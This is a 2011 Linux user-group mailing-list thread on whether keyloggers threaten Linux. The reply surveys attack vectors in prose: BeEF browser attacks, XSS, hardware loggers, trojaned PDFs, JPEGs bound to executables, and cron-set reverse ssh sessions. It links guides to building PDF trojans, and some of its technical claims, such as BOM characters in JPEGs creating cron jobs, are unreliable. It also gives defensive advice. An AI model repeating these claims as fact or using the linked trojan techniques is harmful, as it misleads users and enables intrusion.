Linux & key Loggers
Lisa Kachold
lisakachold at obnosis.com
Thu Jun 30 16:16:27 MST 2011
Mike:
More to make the post complete with all available attack vectors that could
be deployed to install a keylogger on Linux (MAC and Windows):
On Thu, Jun 30, 2011 at 2:09 PM, mike enriquez <mylinux at cox.net> wrote:
> **
> On 06/30/2011 06:55 AM, Lisa Kachold wrote:
>
> Hi Mike!
>
> On Wed, Jun 29, 2011 at 5:09 PM, mike enriquez <mylinux at cox.net> wrote:
>
>> Does anyone on the List know if Key Loggers are a problem in Linux?
>> I don't know a thing about them. My windows computers get the things all
>> the time.
>> Do I need to worry about them in Linux.
>> Thanks for any comments.
>>
>
> Unlike Windows, where the attack vector is mainly virus from file
> transfers, in Linux (and Mac) the attack vector is going to be browser
> based.
>
> So if you don't limit javascript trust, you can fall victim to any manner
> of installations, ssh, or infestations from browser based attacks like
> BEef <http://linux.softpedia.com/get/Internet/HTTP-WWW-/BeEF-29854.shtml>.
> This tool will provide a triangulated Host --> Website --> YourBrowser
> attack similar to XSS scripting browser attacks, that opens your entire
> linux (or Mac) system to full control via the Browser (Opera/FireFox/etc).
> A keylogger like the one referenced by Sam would trivially be installed
> without your immediate knowledge.
>
> Of course if you do not properly firewall your home network, have a "cable
> modem" that is subject to hacked firmware, or take your laptop to public
> venues without a proper analysis of open ports or iptables, you can always
> pick up a "hitcher", who could install a key logger or other hack.
>
> Various hardware hacks also exist, similar to tiny USB devices that can be
> setup on your keyboard or monitor between connections, which are commonly
> used by IT managers in NOCs and Operations Centers (where oblivious
> Operations and Systems staff continue to surf Facebook rather than actually
> work).
>
> Regularly reading the logs, setting up reporting devices that inform of new
> files or packages and of course watching packet traffic by port on a regular
> basis will assist you to identify keyloggers, as well as BEef and XSS
> browser hacks, since you will clearly see a great deal of nepharious
> traffic.
>
> Of course if you allow 3rd Party Cookies and don't control Javascript, you
> are just laying on a large number of "adware" and other installations that
> create traffic. Be sure you use NoScript or another Javascript trust
> control plugin at the browser level.
>
> It is recommended that ANY systems user always have a fairly realistic
> understanding of network trust, packet ports and "regular traffic".
>
> Also, beyond KEYLOGGERS, everyone needs to know that EVERY SINGLE SITE YOU
> GOOGLE, every place you visit can trivially be cross referenced from other
> sites for which you authenticate to provide AT A GLANCE NSA and DHS data
> that will provide a complete profile. This includes CHAT LOGS, Warez sites,
> TORRENT, and porn sites.
> The false sense of security that you can use a Anonymizer or browser Proxy
> site, while it will allow you get to FaceBook from work, will not protect
> you from large scale data taps at the level of Akamai Caching and
> Cable/Telecom providers which can be configured to hit any number of
> parameters for which the feds are interested.
>
>
> Also, if you download FULL email messages, including PDF attachments,
(which you open without updating your Adobe Browser Plugin or other
applications for all known exploits) and JPEGs (executable files which I can
trivially [bind to an .exe file for Win7 powershell fun] or include Unicode
UTF or BOM characters that can and will setup cron jobs (to open a reverse
ssh session to my hacked server at a certain time of night for instance) or
wget a keylogger [since this is the subject we are discussing here in this
PLUG post] when "opened") you are opening new attack vectors for Linux (or
even specifically addressed to you by an associate) [an excellent reason to
obfuscate your "real identity" at 2600 Club meetings....].
References:
http://xahlee.org/comp/unicode_BOM_byte_orde_mark.html
http://www.hackingethics.com/blog/2008/07/22/how-to-convert-exe-files-to-jpg/
http://justhackitnow.blogspot.com/2011/02/hide-multiple-files-into-single-jpg.html
http://www.dirtyservices.com/2010/how-to-create-adobe-acrobat-pdf-exploit-trojan/
>
>> Mike Enriquez
>> ---------------------------------------------------
>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>> To subscribe, unsubscribe, or to change your mail settings:
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>
>
>
>
> --
> (602) 791-8002 Android
> (623) 239-3392 Skype
> (623) 688-3392 Google Voice
> **
> HomeSmartInternational.com <http://www.homesmartinternational.com>
>
> Thank you Lisa,
> I love this group.
> Every time I ask a question I get an education.
> Take Care.
> Mike
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
--
(602) 791-8002 Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice
**
HomeSmartInternational.com <http://www.homesmartinternational.com>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20110630/ca5efff6/attachment.html>
More information about the PLUG-discuss
mailing list